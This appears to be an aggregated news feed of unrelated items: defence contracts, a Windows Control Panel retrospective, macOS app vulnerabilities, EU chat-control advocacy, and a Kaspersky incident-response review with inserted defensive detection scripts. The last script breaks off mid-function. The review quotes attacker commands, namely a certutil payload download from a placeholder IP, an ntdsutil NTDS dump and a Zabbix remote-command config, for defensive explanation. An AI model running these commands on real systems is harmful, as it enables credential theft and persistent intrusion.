


Nuclear-powered submarines for India and Australia worry Beijing

Those Americans who argue that the US holds a structural advantage over China (known in academic circles as primacists or denialists) often focus on the two countries' borders: while the US borders two friendly countries and two oceans, Beijing sits at the centre of a region



Pfizer, Microsoft, Palantir, Home Depot, and Lockheed Martin were all shown as "clients" of LobbyMatic. All of them say they haven't worked with the company.
#LobbyMatic #JacobWohl #AIImages #AI #AILobbying



A Windows Control Panel Retrospective Amidst a Concerning UX Shift



Once the nerve center of Windows operating systems, the Control Panel and its multitude of applets have their roots in the earliest versions of Windows. From here users could use these configuration applets to control and adjust just about anything in a friendly graphical environment. Despite the lack of any significant criticism from users, and with many generations having grown up with its familiar dialogs, it has over the past years been gradually phased out by the monolithic Universal Windows Platform (UWP) based Settings app.

Whereas the Windows control panel features an overview of the various applets – each of which uses Win32 GUI elements like tabs to organize settings – the Settings app is more Web-like, with lots of touch-friendly whitespace, a single navigable menu, kilometers of settings to scroll through and absolutely no way to keep more than one view open at the same time.

Unsurprisingly, this change has not been met with a lot of enthusiasm by the average Windows user, and with Microsoft now officially recommending users migrate over to the Settings app, it seems that before long we may have to say farewell to what has been an intrinsic part of the Windows operating system since its first iterations. Yet bizarrely, much of the Control Panel functionality doesn’t exist yet in the Settings app, and it remains an open question how much of it can be translated into the Settings app user experience (UX) paradigm at all.

Considering how unusual this kind of control panel used to be beyond quaint touch-centric platforms like Android and iOS, what is Microsoft’s goal here? Have they discovered a UX secret that has eluded every other OS developer?

A Simple Concept

The Windows 3.1 Control Panel (1992). (Source: ToastyTech.com)
Settings which a user may want to tweak on their computer system range from hardware devices and networks to the display resolution and wallpaper, so it makes sense to put all of these configuration options in one location that is easy to reach and use. Generally this has meant something akin to a folder containing various clickable icons with accompanying text, which together make clear what settings can be configured by opening each one. In addition, the same setting dialogs can be accessed using context-sensitive menus, such as when right-clicking on the desktop.
The Windows 98 Control Panel. (Source: ToastyTech.com)
It’s little wonder that for the longest time operating systems have settled for this approach, as it is intuitive, and individual items can have stylized icons that make it even more obvious what settings can be configured by clicking on them, such as a keyboard, a mouse, a display, etc. As graphical fidelity increased, so did the styling of these icons, with MacOS, Windows, BeOS and the various desktop environments for OSs like the Linuxes and BSDs all developing their own highly skeuomorphic styles to make their UIs more intuitive and also more pleasant to look at. A good overview of the Windows Control Panel evolution can be found over at the Version Museum website.
The Windows XP Control Panel in ‘Classic’ view (2001). (Source: suffieldacademy.org)
Coming from the still somewhat subdued style of Windows XP after years of Windows 9x and Windows NT/2000, Windows Vista and Windows 7 cranked this style up to eleven with the Windows Aero design language. This meant glass, color, translucency, depth and high-fidelity icons that made the function of the Control Panel’s individual entries more obvious than ever, creating a masterpiece that would be very hard to beat. The user was also given two different ways to view the Control Panel: the simplified category-based view, or the ‘classic’ view with all icons (and folders for e.g. Administrative Tools) visible in one view.
Windows 7 Control Panel (2009) in category view. (Source: techrepublic.com)
Meanwhile Apple did much the same thing, leaning heavily into their unique design language not only for its desktop, but ultimately also for its mobile offerings. Everything was pseudo-3D, with vivid colors adorning detailed renderings of various physical items and so on, creating a true feast for the eyes when taking in these lush UIs, with efficient access to settings via clearly marked tabs and similar UI elements.
The Mac OS X Panther System Preferences in 2003. (Source: Gadget Unity TV)
This way of organizing system settings was effectively replicated across a multitude of environments, with operating systems like Haiku (based on BeOS) and ReactOS (re-implementing Windows) retaining those classical elements of the original. A truly cross-platform, mostly intuitive experience was created, and Bliss truly came to the computing world.

Naturally, something so good had no right to keep existing, ergo it had to go.

The World Is Flat


The first to make the big change was Microsoft, with the release of Windows 8 and its Metro design language. This new visual style relied on simple shapes, with little to no adornments or distractions (i.e. more than a single color). Initially Microsoft also reckoned that Windows users wanted every window to be full-screen, and that hot edges and sides rather than a task bar and start menu were the way to go, as every single system running Windows 8 would obviously have a touch screen. Fortunately they did backtrack on this, but their attempt to redesign the Control Panel into something more Metro-like with the Settings app did persist, like an odd growth somewhere on a body part.
Windows 8’s PC Settings app (2012). (Source: softpedia.com)
Although the Control Panel remained in Windows 8 as well, the course had been set. Over time this small lump developed into the Settings app in Windows 10, by which time Metro had been renamed into the Microsoft Design Language (MDL), which got a recent tweak in what is now called the Fluent Design Language (FDL) for Windows 11.

Central to this is the removal of almost all colors, the use of text labels over icons where possible (though simple monochrome icons are okay) and only rectangles with no decorations. This also meant no folder-centric model for settings but rather all the items put into a text-based menu on the left-hand side and an endless scroll-of-doom on the right side containing sparsely distributed settings.

This led to the absolutely beautifully dystopian Settings app as it exists in Windows 10:
The Settings app in Windows 10 back in ~2015. Hope you don’t like colors.
All of this came as skeuomorphic designs were suddenly considered ‘passé’, and the new hotness was so-called Flat Design. Google’s Material Design as developed in 2014 is another good example of this, with the characteristic ‘flat UI elements adrift in a void’ aesthetic that has now been adopted by Microsoft, and a few years ago by Apple as well starting in 2022 with MacOS Ventura’s System Settings (replacing System Preferences).
Monterey’s General system preferences (left) are different from Ventura’s General system settings (right). (Credit: MacWorld)
Rather than a tabbed interface to provide a clear overview, everything is now a blind hierarchy of menu items to scroll through and activate to access sub-, sub-sub-, and sub-sub-sub- items, and inevitably realize a few times that you’re in the wrong section. But rather than being able to click that other, correct tab, you now get to navigate back multiple views, one click at a time.

It isn’t just Windows and Apple either, but many of the big desktop environments like Gnome have also moved to this Flat Design Language. While various reasons have been provided for these changes, it’s undeniable that FDL makes a UI less intuitive (because there’s less useful visual information) and makes for a worse user experience (UX) with worse ergonomics as a result (because of the extra scrolling and clicking). This is especially obvious in the ‘independent applets’ versus ‘monolithic settings app’ comparison.

One-Track Mind


Imagine that you’re trying out a couple of new wallpapers in Windows while keeping an eye on Windows Update’s latest shenanigans. You then need to quickly adjust the default audio device or make another small adjustment unrelated to any of these other tasks. If you are using Windows 7 or earlier with the Control Panel applets, this is normal behavior and exceedingly common, especially during hardware troubleshooting sessions.

If you’re using the Settings app, this is impossible, as only one view can be active at a given time. You think you’re smart and right-click the desktop for ‘Personalize desktop’ so that the other Settings view stays intact? This is not how it works, as the Settings app is monolithic and now shifts to the newly selected view. Currently this is not too noticeable yet, as many applets still exist in Windows 10 and 11, but as more and more of these are assimilated into the Settings app, such events will become more and more common.

It would seem that after decades of UI and UX evolution, we have now reached a definite point where UX is only getting worse, arguably around the release of Windows 8. With color banished, anything even remotely pseudo-3D frowned upon and UIs based around touch interfaces, there will soon be no difference between using a desktop PC, tablet or smartphone. Just in the worst way possible, as nobody has ever written about the amazing ergonomics and efficient UX of the latter two devices.

Perhaps our only hope may lie with the OSes and desktop environments that keep things real and stick to decades of proven UX design rather than give into Fad Driven Development.

Rest in peace, Windows Control Panel. We hope to see you again soon in ReactOS.


hackaday.com/2024/09/03/a-wind…



Microsoft apps on macOS can be used to access the user’s confidential data


Security researchers have discovered eight new vulnerabilities in the macOS versions of Microsoft applications (Outlook, Teams, Word, Excel, PowerPoint and OneNote) which, if exploited, allow attackers to escalate privileges and gain access to confidential data.

According to a description by Cisco Talos, the identified flaws help bypass the operating system’s privacy settings, which are based on the TCC (Transparency, Consent and Control) framework.

“If an attacker exploits the discovered vulnerabilities, they could gain all the rights granted by Microsoft to the affected applications,” the experts write.

“For example, an attacker could send emails from the victim’s account, as well as record audio and video, without any interaction with the targeted user,” they added.

In theory, an attacker can inject malicious libraries into any of these applications, which would allow them not only to obtain that application’s rights but also to extract a range of confidential data. As the experts note, successful exploitation requires the attacker to already have some access to the victim’s system.

TCC and data protection


TCC enforces a policy that requires applications to obtain the user’s explicit consent before they can access protected resources such as contacts, calendars, photos and location, ensuring that users retain direct control over their personal information and over which applications can access their data.

TCC works together with entitlements, which are a set of capabilities required for an app’s functionality. Developers choose these entitlements from a selection provided by Apple and, although only a subset of all possible entitlements is available for general use, the most powerful ones are reserved exclusively for Apple’s own applications and system binaries.

When an application with specific entitlements first requests use of a particular capability, an authorization pop-up is displayed.
[Image: TCC authorization prompt for “Malevolent App” requesting camera access]
The image above shows an example of such an authorization request: “Malevolent App” would like to access the camera. The user must decide whether to allow or deny camera access. This decision is then recorded in the TCC database.

Once the user has made their choice, any future camera request from “Malevolent App” will be governed by the decision recorded in the database. This system effectively allows users to control, and be informed of, the privacy-sensitive actions an application intends to perform. The required user interaction is what allows users to prevent malicious applications from performing sensitive actions such as recording video or taking photos.

A user can later verify this authorization in the “Privacy & Security” section of macOS “System Settings”. There, a list of permissions can be found, including Camera, Microphone and Location Services.
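Beyond the System Settings pane, a defender reviewing a Mac can read the TCC database directly and list which bundle identifiers hold camera or microphone grants. The script below is an added example, not code from the article or from Cisco Talos: it builds an in-memory SQLite database with a simplified, constructed subset of the TCC `access` table (the real table has more columns and its layout changes between macOS versions), then lists grants that are not on a reviewer's allowlist. The column names, the `auth_value` meanings (0 denied, 2 allowed) and the bundle identifiers are assumptions made for the example.

```python
import sqlite3

# Constructed, simplified subset of the TCC `access` table (assumption: enough for
# an allow/deny listing; the real schema has more columns and varies by macOS version).
SCHEMA = """
CREATE TABLE access (
    service       TEXT    NOT NULL,
    client        TEXT    NOT NULL,
    client_type   INTEGER NOT NULL,
    auth_value    INTEGER NOT NULL,
    auth_reason   INTEGER NOT NULL,
    last_modified INTEGER NOT NULL
);
"""

# auth_value as recorded by TCC (assumption): 0 = denied, 2 = allowed.
DENIED, ALLOWED = 0, 2

# Constructed rows: an allowed Microsoft app, the denied "Malevolent App", and an
# unfamiliar helper bundle that nevertheless holds a microphone grant.
SAMPLE_ROWS = [
    ("kTCCServiceCamera",     "com.microsoft.teams2",      0, ALLOWED, 2, 1700000000),
    ("kTCCServiceCamera",     "com.example.malevolent",    0, DENIED,  2, 1700000100),
    ("kTCCServiceMicrophone", "com.microsoft.teams2",      0, ALLOWED, 2, 1700000000),
    ("kTCCServiceMicrophone", "com.example.unknownhelper", 0, ALLOWED, 2, 1700000200),
]


def build_sample_db():
    """Create the in-memory database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO access VALUES (?,?,?,?,?,?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def granted_clients(conn, service):
    """Bundle identifiers allowed to use `service` (e.g. kTCCServiceCamera)."""
    rows = conn.execute(
        "SELECT client FROM access WHERE service = ? AND auth_value = ? ORDER BY client",
        (service, ALLOWED),
    ).fetchall()
    return [r[0] for r in rows]


def unexpected_grants(conn, services, allowlist):
    """(service, client) pairs granted to clients the reviewer did not expect."""
    out = []
    for svc in services:
        for client in granted_clients(conn, svc):
            if client not in allowlist:
                out.append((svc, client))
    return out


if __name__ == "__main__":
    db = build_sample_db()
    expected = {"com.microsoft.teams2"}
    for svc, client in unexpected_grants(db, ["kTCCServiceCamera", "kTCCServiceMicrophone"], expected):
        print(f"review: {client} holds {svc}")
```

On a real machine the per-user database lives at ~/Library/Application Support/com.apple.TCC/TCC.db and the system-wide one under /Library/Application Support/com.apple.TCC/; reading either requires the reading tool itself to have Full Disk Access, and a grant held by a bundle you do not recognise is exactly the kind of entry worth reviewing after a report like the one above.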

The article Microsoft apps on macOS can be used to access the user’s confidential data comes from il blog della sicurezza informatica.




Why London’s next strategy document also concerns Rome

The echo of the Strategic defence review (Sdr) announced by the new British Prime Minister Keir Starmer has reached Italy too, on the wings of the Global combat air programme (Gcap). While Guido Crosetto, Minister of Defence, and Leonardo’s top management have expressed confidence about the stability of the



The FSFE newsletter: the Apple case, funding for Free Software, YH4F and the ZOOOM project

Supporting Free Software in Europe after the EU decision to block funding for #NGI, and #Apple’s lawsuit against the European Commission…



New British helicopter. Leonardo heads toward the billion-pound contract

Italy’s Leonardo is the only company left in the running for the contract, estimated at one billion pounds (1.19 billion euros), to renew the rotary-wing component of the British armed forces. The withdrawal of Airbus and Sikorsky (a Lockheed Martin group company) from the competition for the programme



Security experts? You are the most in demand! In public administration, 46% of cybersecurity positions are vacant


A global survey commissioned by Kaspersky Lab found that 41% of companies are in desperate need of cybersecurity specialists. Cyber threat experts and malware analysis specialists are the most sought after (39% each).

There is also a shortage of SOC analysts (35%), pentest and network security specialists (33%) and threat intelligence analysts (32%). Broken down by sector, the cybersecurity staff shortage is felt most in the public sector, where almost half of the vacancies go unfilled (46%).

Second in this ranking are telecommunications and media (39%), third retail and healthcare (37% each). Cybersecurity is best covered in the IT and financial sectors (31% and 27% respectively).

The survey, conducted by Grand View Research in 29 countries, involved 1,012 company representatives holding various positions: managers (IT, SOC), lead specialists and cybersecurity experts.

“We see strong demand, in particular, for cybersecurity implementation engineers and SOC analysts, as well as for security development specialists,” said Vladislav Galimov, head of the cybersecurity recruitment group at Kaspersky.

“We also believe that in the near future the need for experts in artificial intelligence and neural network security will start to grow.” Similar results were obtained by a comparable study of the cybersecurity labour market conducted by Angara Security.

According to the service provider, last year the number of vacancies in the cybersecurity sector increased by 27%.

According to experts, the growing shortage of cybersecurity staff is directly linked to the general path toward digitalisation of the economy and to tightening regulatory requirements on security in the face of the increasing number and complexity of cyberattacks.

The article Security experts? You are the most in demand! In public administration, 46% of cybersecurity positions are vacant comes from il blog della sicurezza informatica.



Robots and infantry together. The US Army wants more drones for its ground forces

The US Army has signed a framework contract worth up to 990 million dollars with AeroVironment for the supply of circling munitions, better known as loitering munitions, of the Switchblade type. Switchblade loitering munitions come in the 300 (2.5



Chat control blitz decision? Hungary wants to push through unprecedented EU plans for messenger mass surveillance after all


As early as tomorrow morning, a majority of EU governments could endorse the controversial draft law on chat control, which had been removed from the agenda in June after massive protests. According to a report by the news service Contexte, the new Hungarian Council Presidency intends to achieve a majority with a small twist, namely removing the search for unknown material using “artificial intelligence” (as requested by the Netherlands). The exact details of the Hungarian proposal are kept secret. But the proposal is still to require bulk automated searches in, and disclosure of, private chats, including end-to-end encrypted chats, that might contain illegal photos or videos. If a user opts out of this “upload moderation” of their chats, they would be blocked from receiving or sending any images, videos and URLs. Signal and Threema have announced they would end their services in the EU if forced to implement the proposed automated monitoring (so-called “client-side scanning”).

Former Pirate Party Member of the European Parliament Patrick Breyer is now calling on EU citizens to turn to their governments: “In June, under massive public pressure, there was a fragile blocking minority to save our digital privacy of correspondence and secure encryption. But now, with no spotlight on government dealings, minimal concessions could tip the scales. Europeans need to understand that they will be cut off from using commonplace secure messengers if chat control is adopted – that means losing touch with your friends and colleagues around the world. Do you really want Europe to become the world leader in bugging our smartphones and requiring blanket surveillance of the chats of millions of law-abiding Europeans?”

Breyer describes the proposal to restrict chat controls to supposedly ‘known’ illegal content as window-dressing: “Regardless of the objective – imagine the postal service simply opened and snooped through every letter without suspicion. It’s inconceivable. Besides, it is precisely the current bulk screening for supposedly known content by Big Tech that exposes thousands of entirely legal private chats, overburdens law enforcement and mass criminalises minors.

The European Parliament is convinced that this Orwellian approach will betray children and victims by inevitably failing in court. It calls for truly effective child protection by mandating security by design, proactive crawling to clean the web and removal of illegal content – none of which is contained in the government proposal on the table now. We have one day to make our governments take a different approach of effective and rights-respecting protection while saving our privacy and security online!”

Breyer’s info portal on chat control: chatcontrol.eu


patrick-breyer.de/en/chat-cont…



A deep dive into the most interesting incident response cases of last year



In 2023, Kaspersky’s Global Emergency Response Team (GERT) participated in services around the world that allowed our experts to gain insight into various threats and techniques used by APT groups, common crimeware and, in some cases, internal adversaries. As we highlighted in our annual report, the most prominent threat in 2023 was ransomware, and the Government vertical was the sector that most frequently requested digital forensics, incident response and malware analysis (DFIRMA) services. While file encryption was the most common threat last year, this post proposes a deep dive into specific cases that caught our attention and were mentioned during our annual DFIRMA report webinar.

The insider fraud attack



A group of collaborators at a government organization identified an internal service that allowed the creation of legitimate transactions that weren’t direct money transfers, but could result in monetary losses for the organization. These losses could reach millions of dollars.

The following scenario (not related to a specific customer) could be considered an example of such misuse of an internal service:

A bank only allows a customer to open a maximum of two bank accounts for free, with the customer paying a fee to open additional accounts. However, the adversary used the internal system to create multiple bank accounts for individual customers, who avoided paying the required fees in exchange for a payment to the adversary. As a result of this incident, the organization reported a loss of more than $20 million.


Many logs related to the application in question, as well as VPN access and network activity, were requested for analysis and the employees involved in the fraudulent activity were identified. Two different cases were analyzed in which the abuse of transaction configuration was confirmed, one by exploiting a vulnerability in a debugging interface and the other by misusing privileges in a valid account.

In the first case, GERT identified a misconfiguration that was abused by the adversaries to steal cookies from other users to impersonate them and their activity. An application on one of the analyzed systems registered exception logging details that included cookies for the user that encountered the exception, allowing us to determine the user involved.
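The root cause in that first case is an application that writes request headers, cookies included, into its exception log, so anyone who can read the log can replay another user's session. The script below is an added example and not code from the post or from GERT: it runs over a constructed exception log, reports every session cookie or authorization header written in clear (the same check lets a responder scope which users' sessions were exposed), and shows the scrubbing step that should have sat in the logging formatter so the value never reaches disk. The log lines, cookie names and header names are constructed for the example.

```python
import re

# Constructed sample of an exception log that records request headers verbatim
# (not the customer's data from the case).
SAMPLE_LOG = """\
2023-05-02 10:14:07 ERROR TransactionService unhandled exception for request /tx/create
  headers: {'Cookie': 'SESSIONID=3f9a1c7e2b; theme=dark', 'Authorization': 'Bearer eyJhbGciOi.abc.def'}
2023-05-02 10:14:09 INFO  TransactionService request /tx/list completed
2023-05-02 10:15:44 ERROR TransactionService unhandled exception for request /tx/approve
  headers: {'Cookie': 'SESSIONID=77bb01de44'}
"""

# Cookie names that carry a session identifier; add the application's own name here.
SENSITIVE_COOKIES = {"SESSIONID", "JSESSIONID", "PHPSESSID", "ASP.NET_SessionId"}
REDACTED = "[REDACTED]"

# name=value pairs as they appear inside a Cookie header dump, and quoted auth headers.
COOKIE_RE = re.compile(r"\b([A-Za-z0-9_.-]+)=([^;'\"\s]+)")
AUTH_HEADER_RE = re.compile(r"'(Authorization|X-Auth-Token)':\s*'([^']*)'")


def find_leaked_credentials(log_text):
    """(line_no, kind, name) for every session cookie or auth header written in clear."""
    findings = []
    for no, line in enumerate(log_text.splitlines(), 1):
        for name, value in COOKIE_RE.findall(line):
            if name in SENSITIVE_COOKIES and value != REDACTED:
                findings.append((no, "cookie", name))
        for name, value in AUTH_HEADER_RE.findall(line):
            if value != REDACTED:
                findings.append((no, "header", name))
    return findings


def scrub(line):
    """Redact session cookie values and auth headers; non-sensitive cookies are kept for debugging."""
    def _cookie(m):
        name = m.group(1)
        return f"{name}={REDACTED}" if name in SENSITIVE_COOKIES else m.group(0)
    line = COOKIE_RE.sub(_cookie, line)
    return AUTH_HEADER_RE.sub(lambda m: f"'{m.group(1)}': '{REDACTED}'", line)


def scrub_log(log_text):
    """Apply scrub() line by line; this is what a logging formatter should do before writing."""
    return "\n".join(scrub(l) for l in log_text.splitlines()) + "\n"


if __name__ == "__main__":
    for no, kind, name in find_leaked_credentials(SAMPLE_LOG):
        print(f"line {no}: {kind} {name} written in clear")
    print(scrub_log(SAMPLE_LOG))
```

Running the detector over a scrubbed copy returns nothing, which is the property to enforce in a test of the application's logging configuration; on the response side, each hit also tells you which session was exposed and from which request, the same linkage GERT used to tie the stolen cookies back to the affected users.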

In the other case, one of the users modified the privileges and details of another user, impersonating that user to create additional transactions in the internal service and attempting to hide the original details. Later, this newly modified user accessed the VPN from a previously known system where another user was accessing the transaction system for what was initially catalogued as legitimate activity, but which was recently confirmed to be part of the malicious activity.

Most of the criminal activity was performed by accessing the infrastructure through the VPN, but it was discovered that a new user was accessing the transaction system from the internal network using the same unauthorized behavior.

The results of the GERT team’s analysis confirmed the collusion of a user involved in the transaction requests and managed to identify the sources and link the user activity to various systems involved in the investigation, including local and remote IDs. This information was used by the customer in a timely manner to take legal action against the insider employee and his accomplices.

Mitre ATT&CK techniques
Tactic                      | Technique used           | Technique ID | Details
Initial Access, Persistence | Valid Accounts           | T1078        | The adversaries used legitimate credentials to access the VPN and the internal service.
Initial Access              | External Remote Services | T1133        | The adversary used the customer’s VPN service to gain network access to the internal service.
Credential Access           | Steal Web Session Cookie | T1539        | The adversary abused a misconfiguration in the transactions service to steal other users’ cookies.
Impact                      | Data Manipulation        | T1565        | After impersonating other users with privileges to create transactions, the adversary started creating unauthorized transactions on their behalf.

Flax Typhoon/SLIME13 APT attack



After enabling Kaspersky Managed Detection and Response (MDR) in a customer’s infrastructure, our platforms detected the presence of well-known software installed on the customer’s premises without their knowledge.

Although these applications were legitimate, attackers used them to gain persistent access to the victim’s environment.

In September 2023, Kaspersky MDR detected a suspicious service on a corporate host. The adversaries used a technique that mimicked the real system application name conhost.exe, but the service was started from a non-standard folder. GERT’s analysis confirmed that the application wasn’t a system service, but was instead associated with SoftEther VPN, a legitimate multi-protocol VPN software.

The supposed conhost application was downloaded to the system by a legitimate local user using the well-known Windows LOLBin certutil, and then installed via command line as a system service:
certutil.exe -urlcache -split -f hxxp://<Public IP>/conhost.exe
Another suspicious service masquerading as wshelper.dll was observed on another host. This DLL was associated with Zabbix agent, which is typically deployed on a monitoring target to actively monitor local resources and applications.

Analysis of the sample confirmed that the configuration file was set to allow remote commands, taking advantage of passive and active checks enabled by Zabbix.
EnableRemoteCommands=1
LogFile=0
Server=0.0.0.0/0
ListenPort=5432
Port 5432 was configured in a firewall rule to allow listening, with the “smart” name PGSQL to make it look legitimate.
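Two of the findings above lend themselves to automated checks: a service binary that borrows a system executable's name but runs from outside the Windows system directories (ATT&CK T1036.005), and a Zabbix agent configuration that turns a monitoring agent into a remote shell. The script below is an added example, not code from the post or from Kaspersky: the service inventory is constructed, the Zabbix default listen port (10050) and the `AllowKey`/`system.run` syntax that replaced `EnableRemoteCommands` on agent 5.0 and later are stated from the Zabbix documentation, and the observed configuration is the one quoted in the post, audited next to a constructed hardened counterpart.

```python
from pathlib import PureWindowsPath

# Constructed service inventory (service name + image path) as exported from the SCM.
SERVICES = [
    {"name": "conhost",  "binary": r"C:\ProgramData\Microsoft\conhost\conhost.exe"},  # masquerade
    {"name": "Spooler",  "binary": r"C:\Windows\System32\spoolsv.exe"},               # legitimate
    {"name": "wuauserv", "binary": r"C:\Windows\System32\svchost.exe"},               # legitimate
    {"name": "svchost",  "binary": r"C:\Users\Public\svchost.exe"},                   # masquerade
]

# Binary names an analyst expects only under the Windows system directories (constructed list).
SYSTEM_BINARY_NAMES = {"conhost.exe", "svchost.exe", "spoolsv.exe", "lsass.exe", "csrss.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def masquerading_services(services):
    """Services whose image uses a system-binary name but lives outside the system directories."""
    hits = []
    for svc in services:
        path = PureWindowsPath(svc["binary"])
        if path.name.lower() in SYSTEM_BINARY_NAMES and str(path.parent).lower() not in SYSTEM_DIRS:
            hits.append((svc["name"], svc["binary"]))
    return hits


ZABBIX_DEFAULT_PORT = "10050"

# Settings that hand command execution to the server or hide the agent's activity.
RISKY_SETTINGS = {
    "EnableRemoteCommands": ("1", "server may run arbitrary commands through system.run[]"),
    "Server": ("0.0.0.0/0", "passive checks accepted from any address"),
    "LogFile": ("0", "agent log effectively disabled"),
}


def audit_zabbix_agent_config(text):
    """(key, value, reason) for every risky line in a zabbix_agentd.conf-style text."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = (s.strip() for s in line.split("=", 1))
        if key in RISKY_SETTINGS and value == RISKY_SETTINGS[key][0]:
            findings.append((key, value, RISKY_SETTINGS[key][1]))
        elif key == "ListenPort" and value != ZABBIX_DEFAULT_PORT:
            findings.append((key, value, "non-default port; check which firewall rule opened it"))
        elif key == "AllowKey" and "system.run" in value:
            findings.append((key, value, "remote command execution allowed (agent 5.0+ syntax)"))
    return findings


# Configuration observed in the case (quoted from the post) and a hardened counterpart (constructed).
OBSERVED_CONFIG = "\n".join(["EnableRemoteCommands=1", "LogFile=0", "Server=0.0.0.0/0", "ListenPort=5432"])
HARDENED_CONFIG = "\n".join([
    "EnableRemoteCommands=0",
    "LogFile=C:\\Program Files\\Zabbix Agent\\zabbix_agentd.log",
    "Server=10.0.0.5",
    "ListenPort=10050",
])

if __name__ == "__main__":
    for name, binary in masquerading_services(SERVICES):
        print(f"masquerading service {name}: {binary}")
    for key, value, reason in audit_zabbix_agent_config(OBSERVED_CONFIG):
        print(f"{key}={value}: {reason}")
```

The port check deliberately does not trust the firewall rule's name: in the case the rule was labelled PGSQL, so correlating the agent's ListenPort with the rule that opened it is what exposes the mismatch.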

GERT’s analysis confirmed that the intrusion lasted more than two years. In the early stages of the attack, an NTDS dump was created using system commands:
cmd /c ntdsutil "ac i ntds" ifm "create full c:\PerfLogs\test" q q
c:\windows\sysvol\domain\ntds\active directory\ntds.dit
During those two years of intrusion, security controls detected and contained multiple attempts to execute pentesting applications such as Mimikatz and CobaltStrike, but all the repurposed legitimate software remained invisible until the customer decided to implement our MDR solution. GERT analysis confirmed that the infrastructure had been compromised since mid-2021. The artifacts and TTPs of the attackers are similar to those used by the Flax Typhoon APT group, which employs minimal malware and custom payloads, but relies heavily on legitimate applications instead.

Mitre ATT&CK techniques
Tactic               | Technique used                                      | Technique ID
Initial Access       | Exploit Public-Facing Application                   | T1190
Resource Development | Develop Capabilities: Malware                       | T1587.001
Credential Access    | OS Credential Dumping: LSASS Memory                 | T1003.001
Credential Access    | OS Credential Dumping: Security Account Manager     | T1003.002
Command And Control  | Protocol Tunneling                                  | T1572
Command And Control  | Ingress Tool Transfer                               | T1105
Credential Access    | Brute Force: Password Spraying                      | T1110.003
Execution            | Exploitation for Client Execution                   | T1203
Lateral Movement     | Remote Services: Remote Desktop Protocol            | T1021.001
Lateral Movement     | Remote Services: SMB/Windows Admin Shares           | T1021.002
Defense Evasion      | Masquerading: Match Legitimate Name or Location     | T1036.005

The MFA lack of control



After enabling multi-factor authentication (MFA) for its “critical employees”, a financial company was targeted by a spear-phishing attack.

The phishing attack spoofed the popular DocuSign platform and was directed at a specific group of employees. Although the company detected the phishing attack and configured rules to avoid receiving similar emails, some users received and opened the malicious email.

Among those who unwittingly opened the link was one of the protected users. The attackers were able to take control of his account thanks to the implementation of a phishing kit configured to automatically steal the MFA tokens.

The initial phishing attack occurred on October 6, 2023, and GERT analysts confirmed that one of the targeted users opened the malicious email the same day, which was followed by new connections opened from different locations outside the company’s headquarters. The attackers also configured additional MFA devices to access the target user’s mailbox contents without being noticed and without tampering with the original mailbox.

The attackers accessed the contents of the mailbox for a few days, allowing them to understand internal processes and prepare a BEC attack.

One month after the initial access, the attackers compromised a privileged email account (where MFA was not enabled). This new account had privileges in Microsoft 365, which allowed new rules and parameters to be configured. The attackers configured “send as” privileges on behalf of critical users, such as money transfer approvers and requesters. The adversaries also used this account to configure forwarding rules to hide messages received from a specific bank and from specific users.

Once the necessary privileges and rules were configured, the attackers sent a new email request using a legitimate template previously used in the company to request money transfers and attached documents collected from the original compromised account, but with a different destination bank account, requesting an international transfer of more than $300,000.

Upon receiving the request, the bank processed the transfer as usual based on the legitimate source and attached documents.

A notification was sent to the customer from an email address belonging to the bank, confirming the transfer. However, this email address wasn’t listed in the attackers’ forwarding rules, so the message was delivered to the customer’s mailbox. After receiving this message, the customer decided to investigate the user responsible for the privileged mail account.

GERT’s analysis confirmed the initial attack date and vector, the compromised users, and all the techniques used by the threat actors, and provided a set of recommendations for protecting and monitoring cloud assets. By analyzing user access logs (UAL) and additional cloud logs, as well as firewall logs and the client’s own system logs, GERT was able to provide a complete timeline detailing all the techniques used by the fraudsters.
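The timeline above is built from a handful of audit-log event types, and each of them can be turned into a standing detection rather than reconstructed after the money has moved. The script below is an added example, not code from the post or from GERT: it triages a constructed list of Microsoft 365 audit events for the four indicators the case describes (sign-in from outside corporate address space, a newly registered MFA method, a SendAs grant, and an inbox rule that deletes or forwards mail from a given sender). The event shape is a simplified subset of a unified audit log export, the operation names follow the Exchange Online and Entra ID audit records as commonly exported but should be verified against your own tenant's data, and the addresses, users and networks are constructed.

```python
from ipaddress import ip_address, ip_network

# Constructed audit events (simplified subset of UAL fields). Operation names are
# assumptions modelled on Exchange Online / Entra ID audit records; verify per tenant.
EVENTS = [
    {"CreationTime": "2023-10-06T09:12:00", "Operation": "UserLoggedIn",
     "UserId": "approver@corp.example", "ClientIP": "203.0.113.45", "Parameters": {}},
    {"CreationTime": "2023-10-06T09:20:00", "Operation": "User registered security info",
     "UserId": "approver@corp.example", "ClientIP": "203.0.113.45",
     "Parameters": {"Method": "Authenticator app"}},
    {"CreationTime": "2023-11-07T08:01:00", "Operation": "Add-RecipientPermission",
     "UserId": "admin-mail@corp.example", "ClientIP": "198.51.100.9",
     "Parameters": {"Identity": "approver@corp.example",
                    "Trustee": "admin-mail@corp.example", "AccessRights": "SendAs"}},
    {"CreationTime": "2023-11-07T08:03:00", "Operation": "New-InboxRule",
     "UserId": "admin-mail@corp.example", "ClientIP": "198.51.100.9",
     "Parameters": {"Name": "..", "From": "notifications@bank.example", "DeleteMessage": "True"}},
    {"CreationTime": "2023-11-07T10:30:00", "Operation": "UserLoggedIn",
     "UserId": "approver@corp.example", "ClientIP": "10.20.0.15", "Parameters": {}},
]

# Constructed corporate address space; sign-ins from elsewhere are worth a look.
CORPORATE_NETWORKS = [ip_network("10.0.0.0/8"), ip_network("192.0.2.0/24")]

# Inbox-rule parameters that hide or divert mail.
RULE_HIDING_PARAMS = {"DeleteMessage", "MoveToFolder", "ForwardTo", "ForwardAsAttachmentTo", "RedirectTo"}


def is_corporate(ip):
    addr = ip_address(ip)
    return any(addr in net for net in CORPORATE_NETWORKS)


def triage(events):
    """(time, user, alert) for each of the BEC indicators seen in the case."""
    alerts = []
    for e in events:
        op, p, when, user = e["Operation"], e["Parameters"], e["CreationTime"], e["UserId"]
        if op == "UserLoggedIn" and not is_corporate(e["ClientIP"]):
            alerts.append((when, user, f"sign-in from non-corporate address {e['ClientIP']}"))
        elif op == "User registered security info":
            alerts.append((when, user, f"new MFA method registered: {p.get('Method', '?')}"))
        elif op == "Add-RecipientPermission" and p.get("AccessRights") == "SendAs":
            alerts.append((when, user, f"SendAs on {p['Identity']} granted to {p['Trustee']}"))
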